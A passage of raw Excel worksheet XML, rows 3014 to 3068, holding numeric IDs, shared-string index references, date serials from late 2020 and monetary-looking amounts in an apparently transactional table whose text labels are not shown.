      <c r="D3014" t="s">
        <v>12343</v>
      </c>
      <c r="E3014">
        <v>12</v>
      </c>
      <c r="F3014" t="s">
        <v>9640</v>
      </c>
      <c r="G3014" s="1">
        <v>44145</v>
      </c>
      <c r="H3014">
        <v>0</v>
      </c>
    </row>
    <row r="3015" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3015">
        <v>22929</v>
      </c>
      <c r="B3015">
        <v>5061</v>
      </c>
      <c r="C3015" t="s">
        <v>7850</v>
      </c>
      <c r="D3015" t="s">
        <v>12343</v>
      </c>
      <c r="E3015">
        <v>12</v>
      </c>
      <c r="F3015" t="s">
        <v>9435</v>
      </c>
      <c r="G3015" s="1">
        <v>44145</v>
      </c>
      <c r="H3015">
        <v>0</v>
      </c>
    </row>
    <row r="3016" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3016">
        <v>22930</v>
      </c>
      <c r="B3016">
        <v>5061</v>
      </c>
      <c r="C3016" t="s">
        <v>7850</v>
      </c>
      <c r="D3016" t="s">
        <v>12343</v>
      </c>
      <c r="E3016">
        <v>12</v>
      </c>
      <c r="F3016" t="s">
        <v>9577</v>
      </c>
      <c r="G3016" s="1">
        <v>44145</v>
      </c>
      <c r="H3016">
        <v>0</v>
      </c>
    </row>
    <row r="3017" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3017">
        <v>22931</v>
      </c>
      <c r="B3017">
        <v>5061</v>
      </c>
      <c r="C3017" t="s">
        <v>7850</v>
      </c>
      <c r="D3017" t="s">
        <v>12343</v>
      </c>
      <c r="E3017">
        <v>12</v>
      </c>
      <c r="F3017" t="s">
        <v>10130</v>
      </c>
      <c r="G3017" s="1">
        <v>44145</v>
      </c>
      <c r="H3017">
        <v>0</v>
      </c>
    </row>
    <row r="3018" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3018">
        <v>22932</v>
      </c>
      <c r="B3018">
        <v>5061</v>
      </c>
      <c r="C3018" t="s">
        <v>7850</v>
      </c>
      <c r="D3018" t="s">
        <v>12343</v>
      </c>
      <c r="E3018">
        <v>12</v>
      </c>
      <c r="F3018" t="s">
        <v>9532</v>
      </c>
      <c r="G3018" s="1">
        <v>44145</v>
      </c>
      <c r="H3018">
        <v>0</v>
      </c>
    </row>
    <row r="3019" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3019">
        <v>22933</v>
      </c>
      <c r="B3019">
        <v>5061</v>
      </c>
      <c r="C3019" t="s">
        <v>7850</v>
      </c>
      <c r="D3019" t="s">
        <v>12343</v>
      </c>
      <c r="E3019">
        <v>12</v>
      </c>
      <c r="F3019" t="s">
        <v>9459</v>
      </c>
      <c r="G3019" s="1">
        <v>44145</v>
      </c>
      <c r="H3019">
        <v>0</v>
      </c>
    </row>
    <row r="3020" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3020">
        <v>22934</v>
      </c>
      <c r="B3020">
        <v>5061</v>
      </c>
      <c r="C3020" t="s">
        <v>7850</v>
      </c>
      <c r="D3020" t="s">
        <v>12343</v>
      </c>
      <c r="E3020">
        <v>12</v>
      </c>
      <c r="F3020" t="s">
        <v>1746</v>
      </c>
      <c r="G3020" s="1">
        <v>44145</v>
      </c>
      <c r="H3020">
        <v>0</v>
      </c>
    </row>
    <row r="3021" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3021">
        <v>22935</v>
      </c>
      <c r="B3021">
        <v>5061</v>
      </c>
      <c r="C3021" t="s">
        <v>7850</v>
      </c>
      <c r="D3021" t="s">
        <v>12343</v>
      </c>
      <c r="E3021">
        <v>12</v>
      </c>
      <c r="F3021" t="s">
        <v>3814</v>
      </c>
      <c r="G3021" s="1">
        <v>44145</v>
      </c>
      <c r="H3021">
        <v>0</v>
      </c>
    </row>
    <row r="3022" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3022">
        <v>22936</v>
      </c>
      <c r="B3022">
        <v>5061</v>
      </c>
      <c r="C3022" t="s">
        <v>7850</v>
      </c>
      <c r="D3022" t="s">
        <v>12343</v>
      </c>
      <c r="E3022">
        <v>12</v>
      </c>
      <c r="F3022" t="s">
        <v>9681</v>
      </c>
      <c r="G3022" s="1">
        <v>44145</v>
      </c>
      <c r="H3022">
        <v>0</v>
      </c>
    </row>
    <row r="3023" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3023">
        <v>22937</v>
      </c>
      <c r="B3023">
        <v>5061</v>
      </c>
      <c r="C3023" t="s">
        <v>7850</v>
      </c>
      <c r="D3023" t="s">
        <v>12343</v>
      </c>
      <c r="E3023">
        <v>12</v>
      </c>
      <c r="F3023" t="s">
        <v>9533</v>
      </c>
      <c r="G3023" s="1">
        <v>44145</v>
      </c>
      <c r="H3023">
        <v>0</v>
      </c>
    </row>
    <row r="3024" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3024">
        <v>22938</v>
      </c>
      <c r="B3024">
        <v>5061</v>
      </c>
      <c r="C3024" t="s">
        <v>7850</v>
      </c>
      <c r="D3024" t="s">
        <v>12343</v>
      </c>
      <c r="E3024">
        <v>12</v>
      </c>
      <c r="F3024" t="s">
        <v>609</v>
      </c>
      <c r="G3024" s="1">
        <v>44145</v>
      </c>
      <c r="H3024">
        <v>0</v>
      </c>
    </row>
    <row r="3025" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3025">
        <v>22939</v>
      </c>
      <c r="B3025">
        <v>5061</v>
      </c>
      <c r="C3025" t="s">
        <v>7850</v>
      </c>
      <c r="D3025" t="s">
        <v>12343</v>
      </c>
      <c r="E3025">
        <v>12</v>
      </c>
      <c r="F3025" t="s">
        <v>9673</v>
      </c>
      <c r="G3025" s="1">
        <v>44145</v>
      </c>
      <c r="H3025">
        <v>0</v>
      </c>
    </row>
    <row r="3026" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3026">
        <v>22940</v>
      </c>
      <c r="B3026">
        <v>5061</v>
      </c>
      <c r="C3026" t="s">
        <v>7850</v>
      </c>
      <c r="D3026" t="s">
        <v>12343</v>
      </c>
      <c r="E3026">
        <v>12</v>
      </c>
      <c r="F3026" t="s">
        <v>2236</v>
      </c>
      <c r="G3026" s="1">
        <v>44145</v>
      </c>
      <c r="H3026">
        <v>0</v>
      </c>
    </row>
    <row r="3027" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3027">
        <v>22941</v>
      </c>
      <c r="B3027">
        <v>5061</v>
      </c>
      <c r="C3027" t="s">
        <v>7850</v>
      </c>
      <c r="D3027" t="s">
        <v>12343</v>
      </c>
      <c r="E3027">
        <v>12</v>
      </c>
      <c r="F3027" t="s">
        <v>4686</v>
      </c>
      <c r="G3027" s="1">
        <v>44145</v>
      </c>
      <c r="H3027">
        <v>0</v>
      </c>
    </row>
    <row r="3028" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3028">
        <v>22942</v>
      </c>
      <c r="B3028">
        <v>5061</v>
      </c>
      <c r="C3028" t="s">
        <v>7850</v>
      </c>
      <c r="D3028" t="s">
        <v>12343</v>
      </c>
      <c r="E3028">
        <v>12</v>
      </c>
      <c r="F3028" t="s">
        <v>9523</v>
      </c>
      <c r="G3028" s="1">
        <v>44145</v>
      </c>
      <c r="H3028">
        <v>0</v>
      </c>
    </row>
    <row r="3029" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3029">
        <v>22943</v>
      </c>
      <c r="B3029">
        <v>5061</v>
      </c>
      <c r="C3029" t="s">
        <v>7850</v>
      </c>
      <c r="D3029" t="s">
        <v>12343</v>
      </c>
      <c r="E3029">
        <v>12</v>
      </c>
      <c r="F3029" t="s">
        <v>9675</v>
      </c>
      <c r="G3029" s="1">
        <v>44145</v>
      </c>
      <c r="H3029">
        <v>0</v>
      </c>
    </row>
    <row r="3030" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3030">
        <v>22944</v>
      </c>
      <c r="B3030">
        <v>235</v>
      </c>
      <c r="C3030" t="s">
        <v>486</v>
      </c>
      <c r="D3030" t="s">
        <v>10198</v>
      </c>
      <c r="E3030">
        <v>16</v>
      </c>
      <c r="F3030" t="s">
        <v>764</v>
      </c>
      <c r="G3030" s="1">
        <v>44172</v>
      </c>
      <c r="H3030">
        <v>0</v>
      </c>
      <c r="J3030" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3031" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3031">
        <v>22945</v>
      </c>
      <c r="B3031">
        <v>463</v>
      </c>
      <c r="C3031" t="s">
        <v>1063</v>
      </c>
      <c r="D3031" t="s">
        <v>12348</v>
      </c>
      <c r="E3031">
        <v>16</v>
      </c>
      <c r="F3031" t="s">
        <v>9437</v>
      </c>
      <c r="G3031" s="1">
        <v>44237</v>
      </c>
      <c r="H3031">
        <v>25000</v>
      </c>
      <c r="I3031" t="s">
        <v>12349</v>
      </c>
      <c r="J3031" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="3032" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3032">
        <v>22946</v>
      </c>
      <c r="B3032">
        <v>1197</v>
      </c>
      <c r="C3032" t="s">
        <v>3820</v>
      </c>
      <c r="D3032" t="s">
        <v>12029</v>
      </c>
      <c r="E3032">
        <v>29</v>
      </c>
      <c r="F3032" t="s">
        <v>4686</v>
      </c>
      <c r="G3032" s="1">
        <v>44145</v>
      </c>
      <c r="H3032">
        <v>65000</v>
      </c>
      <c r="J3032" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3033" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3033">
        <v>22947</v>
      </c>
      <c r="B3033">
        <v>1197</v>
      </c>
      <c r="C3033" t="s">
        <v>3820</v>
      </c>
      <c r="D3033" t="s">
        <v>12029</v>
      </c>
      <c r="E3033">
        <v>29</v>
      </c>
      <c r="F3033" t="s">
        <v>2236</v>
      </c>
      <c r="G3033" s="1">
        <v>44145</v>
      </c>
      <c r="H3033">
        <v>120000</v>
      </c>
      <c r="J3033" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="3034" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3034">
        <v>22948</v>
      </c>
      <c r="B3034">
        <v>1687</v>
      </c>
      <c r="C3034" t="s">
        <v>2513</v>
      </c>
      <c r="D3034" t="s">
        <v>12350</v>
      </c>
      <c r="E3034">
        <v>2</v>
      </c>
      <c r="F3034" t="s">
        <v>12351</v>
      </c>
      <c r="G3034" s="1">
        <v>44200</v>
      </c>
      <c r="H3034">
        <v>900000</v>
      </c>
      <c r="I3034" t="s">
        <v>12352</v>
      </c>
      <c r="J3034" t="s">
        <v>10272</v>
      </c>
    </row>
    <row r="3035" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3035">
        <v>22949</v>
      </c>
      <c r="B3035">
        <v>841</v>
      </c>
      <c r="C3035" t="s">
        <v>3060</v>
      </c>
      <c r="D3035" t="s">
        <v>10999</v>
      </c>
      <c r="E3035">
        <v>2</v>
      </c>
      <c r="F3035" t="s">
        <v>1030</v>
      </c>
      <c r="G3035" s="1">
        <v>44153</v>
      </c>
      <c r="H3035">
        <v>100</v>
      </c>
      <c r="J3035" t="s">
        <v>12353</v>
      </c>
    </row>
    <row r="3036" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3036">
        <v>22950</v>
      </c>
      <c r="B3036">
        <v>5074</v>
      </c>
      <c r="C3036" t="s">
        <v>7879</v>
      </c>
      <c r="D3036" t="s">
        <v>12354</v>
      </c>
      <c r="E3036">
        <v>8</v>
      </c>
      <c r="F3036" t="s">
        <v>1276</v>
      </c>
      <c r="G3036" s="1">
        <v>44159</v>
      </c>
      <c r="H3036">
        <v>500000</v>
      </c>
      <c r="I3036" t="s">
        <v>12355</v>
      </c>
    </row>
    <row r="3037" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3037">
        <v>22951</v>
      </c>
      <c r="B3037">
        <v>2608</v>
      </c>
      <c r="C3037" t="s">
        <v>5292</v>
      </c>
      <c r="D3037" t="s">
        <v>10088</v>
      </c>
      <c r="E3037">
        <v>2</v>
      </c>
      <c r="F3037" t="s">
        <v>12356</v>
      </c>
      <c r="G3037" s="1">
        <v>44160</v>
      </c>
      <c r="H3037">
        <v>0</v>
      </c>
      <c r="J3037" t="s">
        <v>12357</v>
      </c>
    </row>
    <row r="3038" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3038">
        <v>22952</v>
      </c>
      <c r="B3038">
        <v>2608</v>
      </c>
      <c r="C3038" t="s">
        <v>5292</v>
      </c>
      <c r="D3038" t="s">
        <v>10088</v>
      </c>
      <c r="E3038">
        <v>2</v>
      </c>
      <c r="F3038" t="s">
        <v>12358</v>
      </c>
      <c r="G3038" s="1">
        <v>44160</v>
      </c>
      <c r="H3038">
        <v>0</v>
      </c>
      <c r="J3038" t="s">
        <v>12359</v>
      </c>
    </row>
    <row r="3039" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3039">
        <v>22953</v>
      </c>
      <c r="B3039">
        <v>2562</v>
      </c>
      <c r="C3039" t="s">
        <v>4285</v>
      </c>
      <c r="D3039" t="s">
        <v>12336</v>
      </c>
      <c r="E3039">
        <v>13</v>
      </c>
      <c r="F3039" t="s">
        <v>6504</v>
      </c>
      <c r="G3039" s="1">
        <v>44160</v>
      </c>
      <c r="H3039">
        <v>7500</v>
      </c>
      <c r="I3039" t="s">
        <v>9536</v>
      </c>
      <c r="J3039" t="s">
        <v>12360</v>
      </c>
    </row>
    <row r="3040" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3040">
        <v>22954</v>
      </c>
      <c r="B3040">
        <v>272</v>
      </c>
      <c r="C3040" t="s">
        <v>942</v>
      </c>
      <c r="D3040" t="s">
        <v>12361</v>
      </c>
      <c r="E3040">
        <v>16</v>
      </c>
      <c r="F3040" t="s">
        <v>12362</v>
      </c>
      <c r="G3040" s="1">
        <v>44175</v>
      </c>
      <c r="H3040">
        <v>700000</v>
      </c>
      <c r="I3040" t="s">
        <v>12363</v>
      </c>
      <c r="J3040" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3041" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3041">
        <v>22955</v>
      </c>
      <c r="B3041">
        <v>486</v>
      </c>
      <c r="C3041" t="s">
        <v>2021</v>
      </c>
      <c r="D3041" t="s">
        <v>12309</v>
      </c>
      <c r="E3041">
        <v>29</v>
      </c>
      <c r="F3041" t="s">
        <v>945</v>
      </c>
      <c r="G3041" s="1">
        <v>44188</v>
      </c>
      <c r="H3041">
        <v>3000000</v>
      </c>
      <c r="I3041" t="s">
        <v>12364</v>
      </c>
      <c r="J3041" t="s">
        <v>12365</v>
      </c>
    </row>
    <row r="3042" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3042">
        <v>22956</v>
      </c>
      <c r="B3042">
        <v>486</v>
      </c>
      <c r="C3042" t="s">
        <v>2021</v>
      </c>
      <c r="D3042" t="s">
        <v>12309</v>
      </c>
      <c r="E3042">
        <v>29</v>
      </c>
      <c r="F3042" t="s">
        <v>2236</v>
      </c>
      <c r="G3042" s="1">
        <v>44188</v>
      </c>
      <c r="H3042">
        <v>21000000</v>
      </c>
      <c r="J3042" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3043" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3043">
        <v>22957</v>
      </c>
      <c r="B3043">
        <v>486</v>
      </c>
      <c r="C3043" t="s">
        <v>2021</v>
      </c>
      <c r="D3043" t="s">
        <v>12309</v>
      </c>
      <c r="E3043">
        <v>29</v>
      </c>
      <c r="F3043" t="s">
        <v>4062</v>
      </c>
      <c r="G3043" s="1">
        <v>44188</v>
      </c>
      <c r="H3043">
        <v>3000000</v>
      </c>
      <c r="J3043" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3044" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3044">
        <v>22958</v>
      </c>
      <c r="B3044">
        <v>486</v>
      </c>
      <c r="C3044" t="s">
        <v>2021</v>
      </c>
      <c r="D3044" t="s">
        <v>12309</v>
      </c>
      <c r="E3044">
        <v>29</v>
      </c>
      <c r="F3044" t="s">
        <v>6917</v>
      </c>
      <c r="G3044" s="1">
        <v>44188</v>
      </c>
      <c r="H3044">
        <v>210000</v>
      </c>
      <c r="J3044" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3045" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3045">
        <v>22959</v>
      </c>
      <c r="B3045">
        <v>486</v>
      </c>
      <c r="C3045" t="s">
        <v>2021</v>
      </c>
      <c r="D3045" t="s">
        <v>12309</v>
      </c>
      <c r="E3045">
        <v>29</v>
      </c>
      <c r="F3045" t="s">
        <v>12366</v>
      </c>
      <c r="G3045" s="1">
        <v>44188</v>
      </c>
      <c r="H3045">
        <v>600000</v>
      </c>
      <c r="J3045" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="3046" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3046">
        <v>22960</v>
      </c>
      <c r="B3046">
        <v>5074</v>
      </c>
      <c r="C3046" t="s">
        <v>7879</v>
      </c>
      <c r="D3046" t="s">
        <v>12354</v>
      </c>
      <c r="E3046">
        <v>8</v>
      </c>
      <c r="F3046" t="s">
        <v>3076</v>
      </c>
      <c r="G3046" s="1">
        <v>44159</v>
      </c>
      <c r="H3046">
        <v>500000</v>
      </c>
      <c r="I3046" t="s">
        <v>12367</v>
      </c>
    </row>
    <row r="3047" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3047">
        <v>22973</v>
      </c>
      <c r="B3047">
        <v>2791</v>
      </c>
      <c r="C3047" t="s">
        <v>7872</v>
      </c>
      <c r="D3047" t="s">
        <v>12368</v>
      </c>
      <c r="E3047">
        <v>14</v>
      </c>
      <c r="F3047" t="s">
        <v>3341</v>
      </c>
      <c r="G3047" s="1">
        <v>44208</v>
      </c>
      <c r="H3047">
        <v>700</v>
      </c>
      <c r="I3047" t="s">
        <v>12369</v>
      </c>
    </row>
    <row r="3048" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3048">
        <v>22976</v>
      </c>
      <c r="B3048">
        <v>2791</v>
      </c>
      <c r="C3048" t="s">
        <v>7872</v>
      </c>
      <c r="D3048" t="s">
        <v>12368</v>
      </c>
      <c r="E3048">
        <v>14</v>
      </c>
      <c r="F3048" t="s">
        <v>12370</v>
      </c>
      <c r="G3048" s="1">
        <v>44208</v>
      </c>
      <c r="H3048">
        <v>150</v>
      </c>
      <c r="I3048" t="s">
        <v>12371</v>
      </c>
    </row>
    <row r="3049" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3049">
        <v>22977</v>
      </c>
      <c r="B3049">
        <v>5073</v>
      </c>
      <c r="C3049" t="s">
        <v>16473</v>
      </c>
      <c r="D3049" t="s">
        <v>16474</v>
      </c>
      <c r="E3049">
        <v>2</v>
      </c>
      <c r="F3049" t="s">
        <v>7901</v>
      </c>
      <c r="G3049" s="1">
        <v>44139</v>
      </c>
      <c r="H3049" s="4">
        <v>24000</v>
      </c>
      <c r="J3049" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="3050" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3050">
        <v>22993</v>
      </c>
      <c r="B3050">
        <v>346</v>
      </c>
      <c r="C3050" t="s">
        <v>570</v>
      </c>
      <c r="D3050" t="s">
        <v>10396</v>
      </c>
      <c r="E3050">
        <v>13</v>
      </c>
      <c r="F3050" t="s">
        <v>12372</v>
      </c>
      <c r="G3050" s="1">
        <v>44162</v>
      </c>
      <c r="H3050">
        <v>0</v>
      </c>
      <c r="I3050" t="s">
        <v>12373</v>
      </c>
    </row>
    <row r="3051" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3051">
        <v>22994</v>
      </c>
      <c r="B3051">
        <v>4960</v>
      </c>
      <c r="C3051" t="s">
        <v>7891</v>
      </c>
      <c r="D3051" t="s">
        <v>12374</v>
      </c>
      <c r="E3051">
        <v>9</v>
      </c>
      <c r="F3051" t="s">
        <v>12375</v>
      </c>
      <c r="G3051" s="1">
        <v>44155</v>
      </c>
      <c r="H3051">
        <v>540000</v>
      </c>
      <c r="I3051" t="s">
        <v>10448</v>
      </c>
    </row>
    <row r="3052" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3052">
        <v>22995</v>
      </c>
      <c r="B3052">
        <v>1347</v>
      </c>
      <c r="C3052" t="s">
        <v>3788</v>
      </c>
      <c r="D3052" t="s">
        <v>12376</v>
      </c>
      <c r="E3052">
        <v>8</v>
      </c>
      <c r="F3052" t="s">
        <v>9546</v>
      </c>
      <c r="G3052" s="1">
        <v>44160</v>
      </c>
      <c r="H3052">
        <v>500000</v>
      </c>
      <c r="I3052" t="s">
        <v>12377</v>
      </c>
    </row>
    <row r="3053" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3053">
        <v>22996</v>
      </c>
      <c r="B3053">
        <v>1347</v>
      </c>
      <c r="C3053" t="s">
        <v>3788</v>
      </c>
      <c r="D3053" t="s">
        <v>12376</v>
      </c>
      <c r="E3053">
        <v>8</v>
      </c>
      <c r="F3053" t="s">
        <v>12378</v>
      </c>
      <c r="G3053" s="1">
        <v>44160</v>
      </c>
      <c r="H3053">
        <v>300000</v>
      </c>
      <c r="I3053" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="3054" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3054">
        <v>22997</v>
      </c>
      <c r="B3054">
        <v>1347</v>
      </c>
      <c r="C3054" t="s">
        <v>3788</v>
      </c>
      <c r="D3054" t="s">
        <v>12376</v>
      </c>
      <c r="E3054">
        <v>8</v>
      </c>
      <c r="F3054" t="s">
        <v>12379</v>
      </c>
      <c r="G3054" s="1">
        <v>44160</v>
      </c>
      <c r="H3054">
        <v>500000</v>
      </c>
    </row>
    <row r="3055" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3055">
        <v>23009</v>
      </c>
      <c r="B3055">
        <v>5067</v>
      </c>
      <c r="C3055" t="s">
        <v>3700</v>
      </c>
      <c r="D3055" t="s">
        <v>12380</v>
      </c>
      <c r="E3055">
        <v>31</v>
      </c>
      <c r="F3055" t="s">
        <v>4686</v>
      </c>
      <c r="G3055" s="1">
        <v>44131</v>
      </c>
      <c r="H3055">
        <v>20000</v>
      </c>
      <c r="J3055" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3056" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3056">
        <v>23010</v>
      </c>
      <c r="B3056">
        <v>691</v>
      </c>
      <c r="C3056" t="s">
        <v>2075</v>
      </c>
      <c r="D3056" t="s">
        <v>12381</v>
      </c>
      <c r="E3056">
        <v>29</v>
      </c>
      <c r="F3056" t="s">
        <v>4686</v>
      </c>
      <c r="G3056" s="1">
        <v>44167</v>
      </c>
      <c r="H3056">
        <v>150000</v>
      </c>
      <c r="J3056" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="3057" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3057">
        <v>23011</v>
      </c>
      <c r="B3057">
        <v>691</v>
      </c>
      <c r="C3057" t="s">
        <v>2075</v>
      </c>
      <c r="D3057" t="s">
        <v>12381</v>
      </c>
      <c r="E3057">
        <v>29</v>
      </c>
      <c r="F3057" t="s">
        <v>2236</v>
      </c>
      <c r="G3057" s="1">
        <v>44167</v>
      </c>
      <c r="H3057">
        <v>50000</v>
      </c>
      <c r="J3057" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="3058" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3058">
        <v>23012</v>
      </c>
      <c r="B3058">
        <v>5003</v>
      </c>
      <c r="C3058" t="s">
        <v>7910</v>
      </c>
      <c r="D3058" t="s">
        <v>12382</v>
      </c>
      <c r="E3058">
        <v>1</v>
      </c>
      <c r="F3058" t="s">
        <v>1030</v>
      </c>
      <c r="G3058" s="1">
        <v>44186</v>
      </c>
      <c r="H3058">
        <v>0</v>
      </c>
      <c r="J3058" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3059" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3059">
        <v>23013</v>
      </c>
      <c r="B3059">
        <v>5003</v>
      </c>
      <c r="C3059" t="s">
        <v>7910</v>
      </c>
      <c r="D3059" t="s">
        <v>12382</v>
      </c>
      <c r="E3059">
        <v>1</v>
      </c>
      <c r="F3059" t="s">
        <v>12383</v>
      </c>
      <c r="G3059" s="1">
        <v>44186</v>
      </c>
      <c r="H3059">
        <v>0</v>
      </c>
      <c r="J3059" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3060" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3060">
        <v>23014</v>
      </c>
      <c r="B3060">
        <v>1232</v>
      </c>
      <c r="C3060" t="s">
        <v>3796</v>
      </c>
      <c r="D3060" t="s">
        <v>12384</v>
      </c>
      <c r="E3060">
        <v>5</v>
      </c>
      <c r="F3060" t="s">
        <v>12385</v>
      </c>
      <c r="G3060" s="1">
        <v>44161</v>
      </c>
      <c r="H3060">
        <v>35000</v>
      </c>
      <c r="J3060" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3061" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3061">
        <v>23015</v>
      </c>
      <c r="B3061">
        <v>1232</v>
      </c>
      <c r="C3061" t="s">
        <v>3796</v>
      </c>
      <c r="D3061" t="s">
        <v>12384</v>
      </c>
      <c r="E3061">
        <v>5</v>
      </c>
      <c r="F3061" t="s">
        <v>12386</v>
      </c>
      <c r="G3061" s="1">
        <v>44161</v>
      </c>
      <c r="H3061">
        <v>60000</v>
      </c>
      <c r="I3061" t="s">
        <v>12387</v>
      </c>
      <c r="J3061" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3062" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3062">
        <v>23016</v>
      </c>
      <c r="B3062">
        <v>1232</v>
      </c>
      <c r="C3062" t="s">
        <v>3796</v>
      </c>
      <c r="D3062" t="s">
        <v>12384</v>
      </c>
      <c r="E3062">
        <v>5</v>
      </c>
      <c r="F3062" t="s">
        <v>12388</v>
      </c>
      <c r="G3062" s="1">
        <v>44161</v>
      </c>
      <c r="H3062">
        <v>40000</v>
      </c>
      <c r="I3062" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3063" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3063">
        <v>23017</v>
      </c>
      <c r="B3063">
        <v>1232</v>
      </c>
      <c r="C3063" t="s">
        <v>3796</v>
      </c>
      <c r="D3063" t="s">
        <v>12384</v>
      </c>
      <c r="E3063">
        <v>5</v>
      </c>
      <c r="F3063" t="s">
        <v>12389</v>
      </c>
      <c r="G3063" s="1">
        <v>44161</v>
      </c>
      <c r="H3063">
        <v>100000</v>
      </c>
      <c r="I3063" t="s">
        <v>9550</v>
      </c>
      <c r="J3063" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3064" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3064">
        <v>23018</v>
      </c>
      <c r="B3064">
        <v>1232</v>
      </c>
      <c r="C3064" t="s">
        <v>3796</v>
      </c>
      <c r="D3064" t="s">
        <v>12384</v>
      </c>
      <c r="E3064">
        <v>5</v>
      </c>
      <c r="F3064" t="s">
        <v>7241</v>
      </c>
      <c r="G3064" s="1">
        <v>44161</v>
      </c>
      <c r="H3064">
        <v>15000</v>
      </c>
      <c r="J3064" t="s">
        <v>11043</v>
      </c>
    </row>
    <row r="3065" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3065">
        <v>23019</v>
      </c>
      <c r="B3065">
        <v>1232</v>
      </c>
      <c r="C3065" t="s">
        <v>3796</v>
      </c>
      <c r="D3065" t="s">
        <v>12384</v>
      </c>
      <c r="E3065">
        <v>5</v>
      </c>
      <c r="F3065" t="s">
        <v>9437</v>
      </c>
      <c r="G3065" s="1">
        <v>44161</v>
      </c>
      <c r="H3065">
        <v>150000</v>
      </c>
      <c r="I3065" t="s">
        <v>9550</v>
      </c>
      <c r="J3065" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3066" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3066">
        <v>23020</v>
      </c>
      <c r="B3066">
        <v>1290</v>
      </c>
      <c r="C3066" t="s">
        <v>3761</v>
      </c>
      <c r="D3066" t="s">
        <v>12390</v>
      </c>
      <c r="E3066">
        <v>31</v>
      </c>
      <c r="F3066" t="s">
        <v>3763</v>
      </c>
      <c r="G3066" s="1">
        <v>44155</v>
      </c>
      <c r="H3066">
        <v>500000</v>
      </c>
      <c r="I3066" t="s">
        <v>9536</v>
      </c>
      <c r="J3066" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="3067" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3067">
        <v>23021</v>
      </c>
      <c r="B3067">
        <v>5096</v>
      </c>
      <c r="C3067" t="s">
        <v>7935</v>
      </c>
      <c r="D3067" t="s">
        <v>12391</v>
      </c>
      <c r="E3067">
        <v>29</v>
      </c>
      <c r="F3067" t="s">
        <v>4686</v>
      </c>
      <c r="G3067" s="1">
        <v>44145</v>
      </c>
      <c r="H3067">
        <v>50000</v>
      </c>
      <c r="J3067" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3068" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3068">
        <v>23022</v>
      </c>
      <c r="B3068">
        <v>1764</v>
      </c>
      <c r="C3068" t="s">
        <v>5918</v>
      </c>
      <c r="D3068" t="s">
        <v>10772</v>
      </c>
      <c r="E3068">
        <v>5</v>
      </c>
      <c r="F3068" t="s">
        <v>3763</v>
      </c>
      <c r="G3068" s="1">
        <v>44148</v>
      </c>
      <c r="H3068">
        <v>30000</v>
      </c>
